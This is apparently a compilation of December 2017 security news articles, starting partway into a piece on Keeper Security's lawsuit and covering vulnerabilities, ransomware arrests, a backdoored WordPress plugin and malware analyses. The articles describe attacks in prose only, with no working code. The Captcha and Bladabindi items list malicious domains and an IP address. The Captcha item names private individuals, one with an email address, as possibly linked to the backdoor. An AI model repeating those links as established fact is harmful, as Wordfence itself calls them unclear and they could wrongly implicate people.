Goodin’s initial article, titled “Microsoft is forcing users to install a critically flawed password manager,” claimed the application had a 16-month-old bug, but it was later updated after Keeper clarified that only a version released this month had been impacted. Despite at least two other updates made to the story, Keeper is still not happy with it and has filed a lawsuit in an effort to get the article removed.

It its complaint, Keeper claims the article “was intended to and did cause harm” to the company by making “false and misleading statements.” The suit covers three counts: defamation, violation of the Uniform Deceptive Trade Practices Act, and commercial disparagement.

Keeper, which requested a jury trial, wants Ars and Goodin not only to remove the story, but also to be awarded damages and have legal costs covered.

While some members of the cybersecurity industry have taken Keeper Security’s side, saying that many of Goodin’s stories are sensationalized, most have sided with the reporter and believe the lawsuit will cause more damage to the company than the article. Several people believe it will have a so-called “Streisand effect.”

Response to Keeper Security suing Ars Technica and Dan Goodin

Response to Keeper Security suing Ars Technica and Dan Goodin

Response to Keeper Security suing Ars Technica and Dan Goodin

Response to Keeper Security suing Ars Technica and Dan Goodin

Response to Keeper Security suing Ars Technica and Dan Goodin

This is not the first time Keeper Security has resorted to legal action over vulnerability disclosures. Back in 2013, it threatened to sue Netherlands-based security firm Fox-IT after it had discovered a critical flaw in one of its products.


Pepperl+Fuchs Ecom Rugged Devices Exposed to KRACK Attacks
21.12.2017 securityweek ICS

Rugged tablets, phones and PDAs made by Ecom Instruments use Wi-Fi components that are vulnerable to a recently disclosed attack method named KRACK.

Ecom Instruments, acquired last year by Germany-based factory automation solutions provider Pepperl+Fuchs, specializes in developing mobile devices designed for use in hazardous areas, including in the chemical and petrochemical, oil and gas exploration, mining, and energy sectors.

According to ICS-CERT and its German counterpart CERT@VDE, several Windows- and Android-based mobile devices from Ecom are affected by the KRACK flaws.

The list of vulnerable products includes Android-based Tab-Ex 01 tablets, Ex-Handy 09 and 209 phones, and Smart-Ex 01 and 201 smartphones, and Windows-based Pad-Ex 01 tablets, and i.roc Ci70-Ex, CK70A-ATEX, CK71A-ATEX, CN70A-ATEX and CN70E-ATEX PDAs.ecom mobile devices vulnerable to KRACK attacks

ecom mobile devices vulnerable to KRACK attacks

“ecom instruments devices are in theory attackable by replay, decryption and forging of packets,” CERT@VDE said in an advisory. “However, to perform the attack, the attacker must be significantly closer to the ecom device than to the access point. The WPA2 password cannot be compromised using a KRACK attack. Note if WPA-TKIP is used instead of AES-CCMP, an attacker can easily forge and inject packets directly into the WLAN.”

Pepperl+Fuchs and Ecom are working on addressing the vulnerabilities in the impacted Android products. As for the Windows-based devices, users have been advised to apply the patches provided by Microsoft and switch to using AES-CCMP encryption instead of WPA-TKIP.

KRACK, or Key Reinstallation Attack, is the name assigned to a series of vulnerabilities in the WPA2 protocol. The flaws can allow an attacker within range of the targeted device to read information that the user believes is encrypted and, in some cases, even inject and manipulate data.

The vulnerabilities affect millions of devices from tens or possibly hundreds of vendors. Pepperl+Fuchs is not the first industrial solutions provider to inform customers that its products are impacted by KRACK.

Days after the vulnerabilities were disclosed, Cisco, Rockwell Automation and Sierra Wireless admitted that their industrial networking devices had been vulnerable. A few weeks later, Siemens, ABB, Phoenix Contact, Lantronix and Johnson Controls also warned customers.

Experts believe the risk of attacks against the industrial devices themselves is not as big as the risk to systems used by ICS engineers and operators for remote access, such as smartphones, tablets, and network communication devices.


Backdoored Captcha Plugin Hits 300,000 WordPress Sites
21.12.2017 securityweek Hacking
Yet another plugin was removed from the WordPress repository after a backdoor was added to it following a recent update.

Called "Captcha" and featuring 300,000 active installs at the time it was removed, the plugin was found to have changed ownership several months ago. Initially developed and maintained by BestWebSoft, it was owned by an unnamed developer at the time the backdoor was added.

Through an update on December 4, code designed to trigger an automatic update process and download a ZIP file from the simplywordpress[dot]net domain was added to the plugin. The archive would extract and install itself over the copy of the Captcha plugin already running on site.

Inside the ZIP archive, a file called plugin-update.php, which was found to be the backdoor, was included, in addition to small changes to the plugin itself. The file would grant the author unauthorized administrative access to the WordPress websites using the plugin.

The backdoor was designed to create a session with user ID 1 (the default admin user WordPress creates at install), to set authentication cookies, and delete itself. Because the backdoor’s installation code was unauthenticated, anyone could trigger it, Wordfence reports.

The ZIP file also included an update to the URL using the same process that installed the backdoor, only this time to remove all traces of the malicious code.

The simplywordpress[.]net domain hosting the ZIP file is registered to a Stacy Wellington (scwellington@hotmail.co.uk), who apparently has registered a large number of other domains as well. One of the domains is unsecuredloans4u[.]co[.]uk, which is linked to Mason Soiza, an individual previously associated with similarly backdoored WordPress plugins.

“[Soiza] has a long history of buying WordPress plugins in order to place cloaked backlinks on his users’ sites. He then uses these backlinks to increase page rank in SERPs (Search Engine Results Pages) since only web crawlers such as Googlebot can read them,” Wordfence explains.

The individual buys plugins and, after a few months, adds the backdoor code to them to create cloaked backlinks to its own loan sites and boost site rankings for different search terms.

simplywordpress[.]net also includes the backdoored plugins Covert me Popup, Death To Comments, Human Captcha, Smart Recaptcha, and Social Exchange.

Looking at the website’s DNS history, Wordfence discovered a previous A-record of 195.154.179.176, which is the current A-record for unsecuredloans4u[.]co[.]uk, Mason Soiza’s domain. The same IP address is also used to host pingloans[.]co[.]uk, a site registered to Serpable Ltd, which is owned by a Charlotte Ann Wellington.

By digging deeper, Wordfence also discovered that both Wellingtons and Mason Soiza are linked to a Quint Group Limited. Stacy Wellington mentions working for Serpable, which is (or was previously) an SEO company and also “is an Introducer Appointed Representative of Quint Group Limited.”

“However, at this time, it’s unclear if either Charlotte or Stacy Wellington is the creator of the backdoor code we discovered in the Captcha plugin,” Wordfence notes.

Given the strong correlation between Stacy Wellington, simplywordpress[.]net, and heyrank[.]co[.]uk (another domain hosted on 195.154.179.176 and registered to the individual), the researchers suggest that wpdevmgr2678, the new owner of the Captcha plugin, could be Stacy Wellington.

Wordfence and the WordPress.org plugins team released a patched version of Captcha (v4.4.5) that no longer includes the backdoor. The automatic update mechanism was used to upgrade all backdoored versions (4.3.6 – 4.4.4) up to the new one and over 100,000 sites running versions the backdoored iterations were upgraded over the weekend.


Authorities Dismantle Ransomware Cybergang
21.12.2017 securityweek
Ransomware
Five Romanian nationals suspected of being part of a cybercrime group focused on distributing ransomware were arrested last week as part of a global cybercrime crackdown operation.

Three of the individuals are suspected of spreading the CTB-Locker (Curve-Tor-Bitcoin Locker, also known as Critroni) ransomware, while the other two were arrested in a parallel ransomware investigation linked to the United States, Europol has revealed.

Called operation “Bakovia,” the joint investigation was carried out by Romanian Police (Service for Combating Cybercrime), the Romanian and Dutch public prosecutor’s office, the Dutch National Police (NHTCU), the UK’s National Crime Agency, the US FBI with the support of Europol’s European Cybercrime Centre (EC3), and the Joint Cybercrime Action Taskforce (J-CAT).

The Dutch High Tech Crime and other authorities informed the Romanian authorities in early 2017 that a group of individuals were involved in the sending of spam messages that appeared to have been sent by companies in countries like Italy, the Netherlands and the UK.

The spam emails contained what appeared to be an archived invoice that would hide malware inside. As soon as the intended victim would open the attachment, the CTB-Locker ransomware would be dropped and the data on the system would start being encrypted.

First observed in 2014, CTB-Locker was among the first ransomware families to use the Tor network to hide its command and control (C&C) infrastructure. New variants of the ransomware were observed over time, and a “vaccine” was released for it last year.

Targeting systems running Windows versions from XP to 8, the malware can encrypt user’s files asymmetrically, making it difficult to decrypt without a key that the attackers would release only after a ransom was paid.

Two people in the same criminal group are suspected to have been also involved in the distribution of the Cerber ransomware and to have infected a large number of computers in the United States. An investigation into the Cerber ransomware infections is undergoing.

Although the two investigations were separate in the beginning, they were joined when authorities discovered that the same group was behind both. The two suspects in the Cerber investigation hadn’t been located at the time of the actions on CTB-Locker, but were arrested one day after the US authorities issued an international arrest warrant for them.

As part of the operation, investigators searched six houses in Romania and seized a large amount of hard drives, laptops, external storage devices, cryptocurrency mining devices, and numerous documents.

“The criminal group is being prosecuted for unauthorised computer access, serious hindering of a computer system, misuse of devices with the intent of committing cybercrimes and blackmail,” Europol says.

The suspects did not develop the malware themselves, but acquired it from specific developers as part of the Ransomware-as-a-service (RaaS) model. They would launch the infection campaigns and pay around 30% of the profits to the developers. Wide-spread among cybercriminals, this modus operandi provides even wannabe criminals with access to powerful malicious applications.

“Ransomware attacks are relatively easy to prevent if you maintain proper digital hygiene. This includes regularly backing up the data stored on your computer, keeping your systems up to date and installing robust antivirus software. Also, never open an attachment received from someone you don’t know or any odd looking link or email sent by a friend on social media, a company, online gaming partner, etc.,” Europol notes.

Ransomware victims are advised to refrain from paying the ransom, as it would not guarantee the safe recovery of the data.

“Today, a clear message has been sent—involvement in cybercrime is not zero risk. These ransomware families claimed many victims in Belgium, Italy, the Netherlands, and the United States, and the arrests of the actors behind them is a significant takedown operation,” Raj Samani, Chief Scientist at McAfee, the security firm involved in the takedown, told SecurityWeek in an emailed statement.


Facebook Launches New Anti-Phishing Feature
21.12.2017 securityweek
Social
Facebook announced on Wednesday the introduction of a new security feature designed to help users check if the emails they receive are legitimate or if they have been sent by cybercriminals.

When it detects a suspicious login attempt or a password change, Facebook notifies users by sending them an email from the Facebookmail.com domain. Cybercriminals often try to spoof these emails in an effort to lure internauts to phishing or other malicious websites.

Users can now check if the email in their inbox really does come from Facebook by going to Settings -> Security and Login -> See recent emails from Facebook. Here they can see recent emails, including ones related to security and logins, and if the message from their inbox is not listed, it’s most likely fake.

Facebook phishing tool

“If you've checked this tool and determined that an email you received is fake, we encourage you to report it to phish@facebook.com, and if you believe your account has been compromised due to a phishing attempt, you may attempt to regain access to your account at: facebook.com/hacked,” said Scott Dickens, Product Manager with Facebook Account Integrity.

The new feature has apparently not been rolled out to all accounts so users who don’t immediately find it in the settings menu should check back in a few days.

The new feature comes just weeks after the social media giant’s founder and CEO, Mark Zuckerberg, claimed his company has prioritized security over profit.

“We're serious about preventing abuse on our platforms. We're investing so much in security that it will impact our profitability. Protecting our community is more important than maximizing our profits,” Zuckerberg said.

Facebook recently awarded researchers $100,000 for discovering a novel technique of detecting credential spear-phishing attacks in enterprise environments. The method combines a new anomaly scoring technique for ranking security alerts with features derived from the analysis of spear-phishing emails.


Windows Hello Face Recognition Tricked by Photo
21.12.2017 securityweek Safety
The facial recognition-based authentication system in Windows Hello has been bypassed by researchers using a printed photo, but the method does not work in the latest versions of Windows 10.

Windows Hello, a feature available in Windows 10, allows users to quickly and easily log into their devices using their face or fingerprints. The face authentication system uses near-infrared (IR) imaging and it’s advertised by Microsoft as “an enterprise-grade identity verification mechanism.”

Researchers have demonstrated on several occasions that face authentication can be bypassed, but some systems, such as Apple’s Face ID, are more difficult to bypass than others. In the case of Windows Hello, experts managed to bypass facial authentication using only a photograph of the legitimate user printed in a certain way.

Matthias Deeg and Philipp Buchegger of Germany-based penetration testing firm SySS managed to conduct successful attacks using low-resolution near-IR photos even with the “enhanced anti-spoofing” feature enabled, which should make it more difficult to trick the system.

“By using a modified printed photo of an authorized user, an unauthorized attacker is able to log in to or unlock a locked Windows 10 system as this spoofed authorized user,” the researchers said in an advisory. “Thus, by having access to a suitable photo of an authorized person (frontal face photo), Windows Hello face authentication can easily be bypassed with little effort, enabling unauthorized access to the Windows system.”

The attack was successfully replicated on Windows 10 versions 1511 and 1607 even with the “enhanced anti-spoofing” feature enabled. In newer versions of the operating system, such as 1703 and 1709, the method no longer works if the anti-spoofing mechanism is turned on.

However, the researchers highlighted that updating to newer versions of Windows 10 and enabling the anti-spoofing feature is not enough to block attacks. Users must also reconfigure Hello Face Authentication.


North Korea Denies Role in WannaCry Ransomware Attack
21.12.2017 securityweek BigBrothers
North Korea on Thursday denied US accusations it was behind the WannaCry global ransomware cyberattack, saying Washington was demonising it.

WannaCry infected some 300,000 computers in 150 nations in May, encrypting user files and demanding hundreds of dollars from their owners for the keys to get them back.

The White House this week blamed Pyongyang for it, adding its voice to several other countries that had already done so.

A spokesman for Pyongyang's foreign ministry said the US allegations were "absurd", adding: "As we have clearly stated on several occasions, we have nothing to do with cyber-attacks."

Washington had "ulterior" motives, the spokesman added according to the North's KCNA news agency.

"This move is a grave political provocation by the US aimed at inducing the international society into a confrontation against the DPRK by tarnishing the image of the dignified country and demonising it," he said.

North Korea is subject to multiple United Nations sanctions over its banned nuclear and ballistic missile programs, and tested its third ICBM last month.

Leader Kim Jong-Un declared his country had achieved full nuclear statehood, in a challenge to US President Donald Trump who responded with promises of "major sanctions".

According to experts North Korea's cyberwarfare targets have expanded from the political -- it was accused of hacking into Sony Pictures Entertainment in 2014 to take revenge for "The Interview", a satirical film that mocked Kim -- to the financial, as it seeks new sources of funding.

A South Korean cryptocurrency exchange shut down on Tuesday after losing 17 percent of its assets in a hacking -- its second cyberattack this year, with the North accused of involvement in the first.

Investigators are probing the possibility that Pyongyang was also behind Tuesday's incident, the Wall Street Journal and Bloomberg News reported.

The North is blamed for a massive $81 million cyber-heist from the Bangladesh Central Bank (BCB) in 2016, as well as the theft of $60 million from Taiwan's Far Eastern International Bank in October.

Pyongyang has angrily denied the accusations -- which it described as a "slander" against the authorities -- but analysts say the digital footprints left behind suggest otherwise.


Fake Bitcoin Wallet Apps Removed from Google Play
21.12.2017 securityweek Android
Three fake Bitcoin applications were recently removed from Google Play after security researchers discovered they were tricking users into sending funds to their developers, mobile security firm Lookout has discovered.

The impressive increase in Bitcoin value over the past several months has stirred interest from individuals worldwide, including cybercriminals. The number of attacks involving the cryptocurrency has increased recently, and it appears that they moved to mobile as well.

Detected as PickBitPocket, the rogue applications in Google Play were designed in such a way that they provide the attacker’s Bitcoin address instead of the seller’s. The malicious programs registered a total of up to 20,000 downloads before Google removed them from the application storefront.

Basically, when attempting to buy goods or services from an Android device where a PickBitPocket wallet app is installed, the user ends up routing the Bitcoin payment to the attacker.

The three fake Bitcoin apps, Lookout reports, included Bitcoin mining, which had between 1,000 and 5,000 installs at the time it was removed, Blockchain Bitcoin Wallet – Fingerprint, which had between 5,000 and 10,000 installs, and Fast Bitcoin Wallet, with between 1,000 and 5,000 installs.

“As Bitcoin captures broader interest, this means more people may be purchasing the cryptocurrency, or looking for mobile wallets to store their coins. Individuals should be vigilant in choosing a secure wallet and should also have a security solution in place to identify malicious activity on their device,” Lookout concludes.


VMWare addressed severe Code Execution vulnerabilities in several products
21.12.2017 securityweek
Vulnerebility

VMware has released security updates to address four vulnerabilities in its ESXi, vCenter Server Appliance (vCSA), Workstation and Fusion products.
The flaws were addressed with the release of six patches for ESXi, version 12.5.8 of Workstation, version 8.5.9 of Fusion, and version 6.5 U1d of vCSA.

Some of the flaws could be exploited by an attacker for arbitrary code execution.

Security experts from Cisco Talos group discovered two of the code execution vulnerabilities that ranked as critical and assigned them a CVSS score of 9.0, while VMware classified them as having “important” severity. The flaws analyzed by the Talos group affects the VNC implementation in VMWare products used to allow remote access to the solutions.

“Today, Talos is disclosing a pair of vulnerabilities in the VNC implementation used in VMWare’s products that could result in code execution. VMWare implements VNC for its remote management, remote access, and automation purposes in VMWare products including Workstation, Player, and ESXi which share a common VMW VNC code base. The vulnerabilities manifest themselves in a way that would allow an attacker to initiate of VNC session causing the vulnerabilities to be triggered.” reads the security advisory published by CISCO.

The vulnerability CVE-2017-4941 resides in the remote management functionality of VMWare, it could be exploited by a remote attacker to execute code in a virtual machine via an authenticated virtual network computing (VNC) session.

“A specially crafted set of VNC packets can cause a type confusion resulting in stack overwrite, which could lead to code execution.” reads the advisory published by Cisco Talos.

The second issue discovered by Cisco Talos is a heap overflow bug tracked as CVE-2017-4933 that could be triggered by an attacker to execute arbitrary code in a virtual machine using specially crafted VNC packets.

“An exploitable code execution vulnerability exists in the remote management functionality of VMware . A specially crafted set of VNC packets can cause a heap overflow resulting in heap corruption. An attacker can create a VNC session to trigger this vulnerability.” states Cisco Talos in the security advisory.

VMware hasn’t classified the flaws as critical because it argued that their exploitation is possible in ESXi only if VNC is manually enabled in the VM’s configuration file and the application is set to allow VNC traffic through the built-in firewall.

VMware

VMware also patched a stored cross-site scripting (XSS) flaw tracked as CVE-2017-4940 and affecting the ESXi Host Client, the issued could be exploited to inject code that gets executed when users access the Host Client. The company credited the expert Alain Homewood from Insomnia Security for its discovery.

The fourth flaw addressed by VMWare is a privilege escalation affecting vCSA that is tracked as CVE-2017-4943. The vulnerability was discovered by Lukasz Plonka and resides in the showlog plugin, it could be exploited by an attacker with low privileges to obtain root level access to the appliance’s base operating system.


Operation Bakovia – Romanian authorities arrest 5 individuals for Spreading CTB Locker and Cerber Ransomware
21.12.2017 securityweek
Ransomware

Operation Bakovia – Romanian police arrested 5 individuals suspected of infecting tens of thousands of computers across Europe and the US with Ransomware.
Another success of law enforcement against cybercrime, this time Romanian police have arrested five individuals suspected of infecting tens of thousands of computers across Europe and the United States with Ransomware.
The arrests are part of an international operation tracked as Operation Bakovia conducted by Europol, the FBI and law enforcement agencies from Romanian, Dutch, and the UK.
The suspects have been arrested for spreading the dreaded Cerber and CTB Locker (Curve-Tor-Bitcoin Locker) ransomware, the police arrested them and raided six houses in East Romania last week.
Three suspects were arrested in Romania, the remaining two men belonging to the same organization were arrested in Bucharest as part of a parallel investigation conducted with the help of US authorities.

“During the last week, Romanian authorities have arrested three individuals who are suspected of infecting computer systems by spreading the CTB-Locker (Curve-Tor-Bitcoin Locker) malware – a form of file-encrypting ransomware. Two other suspects from the same criminal group were arrested in Bucharest in a parallel ransomware investigation linked to the US.” states the announcement published by Europol.

“During this law enforcement operation called “Bakovia“, six houses were searched in Romania as a result of a joint investigation carried out by the Romanian Police (Service for Combating Cybercrime), the Romanian and Dutch public prosecutor’s office, the Dutch National Police (NHTCU), the UK’s National Crime Agency, the US FBI with the support of Europol’s European Cybercrime Centre (EC3) and the Joint Cybercrime Action Taskforce (J-CAT).”

As a result of the investigation, during the raid, the police seized a significant amount of hard drives, external storage, laptops, cryptocurrency mining devices, numerous documents and hundreds of SIM cards.

The suspects are being prosecuted for unauthorized computer access, serious hindering of a computer system, misuse of devices with the intent of committing cybercrimes and blackmail.

The Europol published a video of the arrests that shows the police’s incursion in the suspects’ residence.

CTB Locker, aka Critroni, is based on CryptoLocker, it was the first ransomware to use the Tor anonymizing network to hide the command and control infrastructure.

The Cerber ransomware was first spotted in 2016, it was offered in the criminal underground as a ransomware-as-a-service (RaaS).

“The investigation in this case revealed that the suspects did not develop the malware themselves, but acquired it from specific developers before launching various infection campaigns of their own, having to pay in return around 30% of the profit.” continues the Europol.

“This modus operandi is called an affiliation program and is “Ransomware-as-a-service”, representing a form of cybercrime used by criminals mainly on the Dark Web, where criminal tools and services like ransomware are made available by criminals to people with little knowledge of cyber matters, circumventing the need for expert technological skills.”

The CTB Locker was the most widespread ransomware in 2016, while Cerber was one of the most profitable ransomware in the criminal ecosystem.

Both ransomware were spread through drive-by-download attacks and phishing campaign.

“In early 2017, the Romanian authorities received detailed information from the Dutch High Tech Crime Unit and other authorities that a group of Romanian nationals was involved in sending spam messages,” Europol said in its press release.“The spam messages intended to infect computer systems and encrypt their data with the CTB-Locker ransomware aka Critroni. Each email had an attachment, often in the form of an archived invoice, which contained a malicious file. Once this attachment was opened on a Windows system, the malware encrypted files on the infected device.”

At the time of publishing the press release, the police did not yet release the identities of the arrested individuals,


Exclusive, CSE CybSec ZLAB Malware Analysis Report: The Bladabindi malware
21.12.2017 securityweek
Virus

The CSE CybSec Z-Lab Malware Lab analyzed a couple of new malware samples, belonging to the Bladabindi family, that were discovered on a looking-good website.
ZLab team detected two new threats hosted on a looking-good website www[.]6th-sense[.]eu. Both malware looks like a legitimate app that users have to install in order to access the media file hosted on the website.

Bladabindi
Figure 1 – Homepage of the malicious website

The malicious website (www[.]6th-sense[.]eu), hosts 2 different malware samples:

“6thClient.exe” can be downloaded clicking the pop-up button on the homepage inviting users to download the client indicated on the screen.
“Firefox.exe” is hosted on the path “www[.]6th-sense[.]eu/Firefox.exe”
Both malware act as spyware, in particular, “Firefox.exe” seems to act as a bot, because it waits for specific commands from a C&C.

Analyzing the TCP stream, we can see the communication session performed by malware with the C&C:

Bladabindi

The first row shows the PC’s name, User’s name, and the OS’s version.
There are two recurrent words: “nyan” and “act”
the first word represents a separator among the information sent to the C2C
the second one represents the category of the information sent by the bot. in this case it is the ‘action’ performed by the host, in particular, it is the name of the window in the foreground
In the middle, we can see some strings coded in Base64. These strings represent the window’s title in the foreground.
The C2C acknowledges the result sending the number Zero to the bot, probably this value indicates that there are no commands to execute on the host.

Both Malware would seem to belong to the malware family Bladabindi.

Bladabindi is a Trojan malware that steals confidential information from the compromised computer. Hackers also use it as a Malware downloader to deliver and execute other malware. With this malware, cybercriminals could steal

Your computer name
Your native country
OS serial numbers
Windows usernames
Operating system version
Stored passwords in chrome
Stored passwords in Firefox
You can download the full ZLAB Malware Analysis Report at the following URL:

Malware Analysis Report: Bladabindi.Dec17


Facebook, WhatsApp Both Put Under Notice by Europe
20.12.2017 securityweek
Social
The French privacy regulator, the National Commission of Computing and Freedoms (CNIL) has issued a formal notice on WhatsApp. It requires the Facebook company to stop personal data transfers to the parent company in the U.S. unless there is a legal basis for doing so. In particular, WhatsApp must obtain 'user consent' (within the meaning of European law) to gather and transfer that data.

It's a busy time for privacy issues between the U.S. and Europe. CNIL published its notice on Tuesday. On the same day, the powerful German competition authority, the Bundeskartellamt (the Federal Cartel Office or FCO), warned Facebook that it "is abusing [its] dominant position by making the use of its social network conditional on its being allowed to limitlessly amass every kind of data generated by using third-party websites."

Last week the European Commission filed an amicus curiae brief (PDF) with the United States Court of Appeals For the Second Circuit in the ongoing dispute between Microsoft and the U.S. government. Noticeably, this was in support of neither party, but was an attempt to ensure that the the U.S. court has a full understanding of the relevant European law -- in this case, specifically the General Data Protection Regulation (GDPR).

The German FCO concern over Facebook is over the widespread collection of personal user data. In February 2017, the FCO declared that it would investigate Facebook. President Andreas Mundt said at the time, "Dominant companies are subject to special obligations. These include the use of adequate terms of service as far as these are relevant to the market. For advertising-financed internet services such as Facebook, user data are hugely important. For this reason it is essential to also examine under the aspect of abuse of market power whether the consumers are sufficiently informed about the type and extent of data collected."

Now the FCO has stated, "The authority holds the view that Facebook is abusing this dominant position by making the use of its social network conditional on its being allowed to limitlessly amass every kind of data generated by using third-party websites." At the heart of the concern is the inadequate informed consent of the user in allowing personal data collection. Facebook claims that it is not a dominant company in Europe (it has more than 30 million active monthly users in Germany); and that it complies with European law.

The concept of free and informed consent also underlies CNIL's notice against Facebook subsidiary, WhatsApp. In August 2016 WhatsApp changed its Terms of Service and Privacy Policy, explaining that in future, its user data would be transferred to Facebook for targeted advertising, security, and business intelligence. The European regulator grouping, known as Article 29 Working Party, quickly asked WhatsApp to stop the transfer of personal data for targeted advertising.

In a subsequent investigation, WhatsApp told CNIL that French personal data had never been used for targeted advertising. However, CNIL determined that personal data was shared for business intelligence and security. "Thus," says the CNIL statement, "information about users such as their phone number or their use habits on the application are shared." While sharing data for security is not an issue, sharing for business intelligence "is not based on the legal basis required by the Data Protection Act for any processing."

According to CNIL, any user consent to this data collection and sharing is neither free nor informed ("the only way to refuse the data transfer for 'business intelligence' purpose is to uninstall the application"). CNIL requested a sample of data that had been transferred, but this was refused by WhatsApp. The data concerned is now in the U.S., and WhatsApp apparently considers that it is only subject to the law of the U.S.

This refusal has been interpreted by CNIL as a breach of WhatsApp's obligation to cooperate with the regulator under Article 21 of the Data Protection Act. It has consequently issued the formal notice requiring WhatsApp to comply with the Data Protection Act within one month.

Neither the CNIL notice nor the FCO statement can directly lead to sanctions against Facebook/WhatsApp. They can best be viewed as shots across the bow, which -- if ignored -- could lead to the full cannon power of European data protection being leveled against Facebook. Both statements being issued on the same day is a remarkable coincidence. Coming exactly one week after the European Commission used the GDPR-relevant Microsoft vs U.S. government court struggle to make sure that U.S. courts understand Europe's point of view is also remarkable.

It could all be coincidence. But coincidence or not, Europe is warning the large American tech companies -- and indeed, any company that trades with or within Europe -- it is taking its data protection laws seriously. While existing sanctions could be funded out of the running costs of large companies, the potential for future GDPR sanctions of up to 4% of global turnover is not something that can be ignored. Any assumption that Europe will not be quick to enforce GDPR when it comes into force in May 2018 should be rejected.


White House Blames North Korea for Cyberattack
20.12.2017 securityweek BigBrothers
The White House on Tuesday publicly accused North Korea of launching a massive cyberattack that hit 150 countries last May -- hobbling networks from Britain's public health system to FedEx.

"After careful investigation, the United States is publicly attributing the massive 'WannaCry' cyberattack to North Korea," said White House homeland security advisor Tom Bossert.

"We do not make this allegation lightly, we do so with evidence and we do so with partners," he added.

Exploiting a security flaw in Microsoft's Windows XP operating system, the malware infected an estimated 300,000 computers demanding ransom to decrypt data.

The United States is the latest country to point the finger of blame at Pyongyang, attribution which comes as part of a drive to exert "maximum pressure" on the regime.

As yet, no retaliatory measures have been announced.

Among the infected computers were those at Britain's National Health Service (NHS), Spanish telecoms company Telefonica and US logistics company FedEx.

London had already blamed North Korea, which hit a third of Britain's public hospitals.

Pyongyang then denied the allegation, saying it went "beyond the limit of our tolerance" and was a "wicked attempt to lure the international community into harboring greater mistrust of the DPRK."

- US government under scrutiny -

Questions had been raised about whether the US government acted in a timely manner to respond to the attack, with Microsoft accusing Washington of spotting the flaw and using it for its own ends.

"This attack provides yet another example of why the stockpiling of vulnerabilities by governments is such a problem," Microsoft's Brad Smith said at the time.

"Repeatedly, exploits in the hands of governments have leaked into the public domain and caused widespread damage," he said, claiming that the National Security Agency of spotting the flaw and saying nothing.

Bossert said that the United States kept only 10 percent of security flaws secret and had no policy of "stockpiling" or withholding information from potential targets.

Since coming to office Donald Trump has sought to put pressure on North Korea, as its reclusive leaders edge ever-closer to developing a ballistic missile that could deliver a nuclear warhead to the United States.

Amid a series of tests Trump's administration has appeared at odds over whether talks could offer a way out of the standoff.

National Security Advisor HR McMaster tried to clean up that question in an interview with the BBC, saying the United States wanted a peaceful solution: "Of course that's what we want but we are not committed to a peaceful resolution."

"We are committed to a resolution, we want the resolution to be peaceful. But, as the president has said, all options are on the table and we have to be prepared if necessary to compel the denuclearization of North Korea without the cooperation of that regime."

Trump's first National Security Strategy released Monday, declared that "North Korea seeks the capability to kill millions of Americans with nuclear weapons."

"Continued provocations by North Korea will prompt neighboring countries and the United States to further strengthen security bonds and take additional measures to protect themselves."


Code Execution Flaws Found in Trend Micro Smart Protection Server
20.12.2017 securityweek
Vulnerebility
Researchers at Core Security have discovered five vulnerabilities in Trend Micro’s Smart Protection Server product, including flaws that could have been exploited for remote code execution.

Smart Protection Server is a cloud-based protection solution that leverages file and web reputation technologies to detect security risks. The product’s administration interface was found to contain information exposure, improper authentication, improper control and improper filtering issues.

The vulnerabilities were reported to Trend Micro in early September and they were patched in mid-November with the release of version 3.3. The security firm has made available an advisory of its own for the flaws, which are tracked as CVE-2017-11398, CVE-2017-14094, CVE-2017-14095, CVE-2017-14096 and CVE-2017-14097. The vendor has rated only one of the issues as high severity, while the rest are medium severity.

One of the security holes is related to the fact that an attacker could have accessed diagnostic logs without authentication via HTTP. Accessing the log file can allow an attacker to obtain information needed to hijack active user sessions and perform authenticated requests.

Once authentication has been bypassed using the aforementioned flaw, an attacker could have exploited a weakness related to a PHP script that creates cron jobs when scheduling software updates. Core Security has released proof-of-concept (PoC) exploits that show how a hacker could have leveraged this vulnerability to execute arbitrary commands and open a reverse shell using specially crafted requests.

Researchers also found a local file inclusion vulnerability that can lead to remote command execution. This weakness is more difficult to exploit as the attacker needs to set up a fake update server and get the Trend Micro product to download a malicious file from it.

Successful exploitation results in a PHP script being written to the server. The attacker can then include the script using the file inclusion vulnerability and execute it.

In this case, escalating privileges to root is also possible, including via methods disclosed a few months ago by researchers Steven Seeley and Roberto Suggi Liverani, who reported identifying more than 200 vulnerabilities in Trend Micro products. Core Security said several of the privilege escalation vectors disclosed by the experts remain unpatched.

Core researchers also discovered a stored cross-site scripting (XSS) flaw that could have been leveraged to execute arbitrary code whenever a user accessed a specific URL.

Finally, Trend Micro Smart Protection Server was affected by an improper access control issue that exposed the credentials needed to access monitored servers and other information. The credentials were stored in a SQLite database in an encrypted form, but the database could have been accessed without authentication and the encryption key was stored in an unprotect location and could have been downloaded by an unauthenticated user.

This is not the first time Core researchers have found vulnerabilities in a security product. In late June, the company said it had discovered several potentially serious flaws in Kaspersky Lab’s Anti-Virus for Linux File Server product.


DHS Warns of Malware Targeting Industrial Safety Systems
20.12.2017 securityweek ICS
The National Cybersecurity & Communications Integration Center (NCCIC) of the U.S. Department of Homeland Security (DHS) on Monday published an analysis report on a piece of malware designed to target industrial safety systems.

FireEye and Dragos reported last week that sophisticated malware, tracked by the companies as Triton and Trisis, caused a shutdown at a critical infrastructure organization somewhere in the Middle East. CyberX, a firm that specializes in industrial cybersecurity, believes Iran was likely behind the attack and the target was probably an organization in Saudi Arabia.

The NCCIC, which dubbed the malware “HatMan,” published a report that describes the threat, and provides mitigations and YARA rules.

The Python-based HatMan malware targets Schneider Electric’s Triconex Safety Instrumented System (SIS) controllers, designed for monitoring processes and restoring them to a safe state or perform a safe shutdown if a potentially dangerous situation is detected.

The malware communicates with SIS controllers via the proprietary TriStation protocol, and allows attackers to manipulate devices by adding new ladder logic.

The attack on the critical infrastructure organization in the Middle East was discovered after the hackers’ activities resulted in the SIS controller triggering a process shutdown. However, experts believe this was likely an accident, and the final goal may have been to cause physical damage.

The NCCIC pointed out in its report that the malware has two main components: one that runs on a compromised PC and interacts with the safety controller, and one that runs on the controller itself.

HatMan malware diagram

“Although by itself HatMan does not do anything catastrophic — safety systems do not directly control the process, so a degraded safety system will not cause a correctly functioning process to misbehave — it could be very damaging when combined with malware that impact s the process in tandem. Were both to be degraded simultaneously, physical harm could be effected on persons, property, or the environment,” NCCIC said in its report.

“It is safe to say that while HatMan would be a valuable tool for ICS reconnaissance, it is likely designed to degrade industrial processes or worse. Overall, the construction of the different components would indicate a significant knowledge about ICS environments — specifically Triconex controllers — and an extended development lifecycle to refine such an advanced attack,” it added.

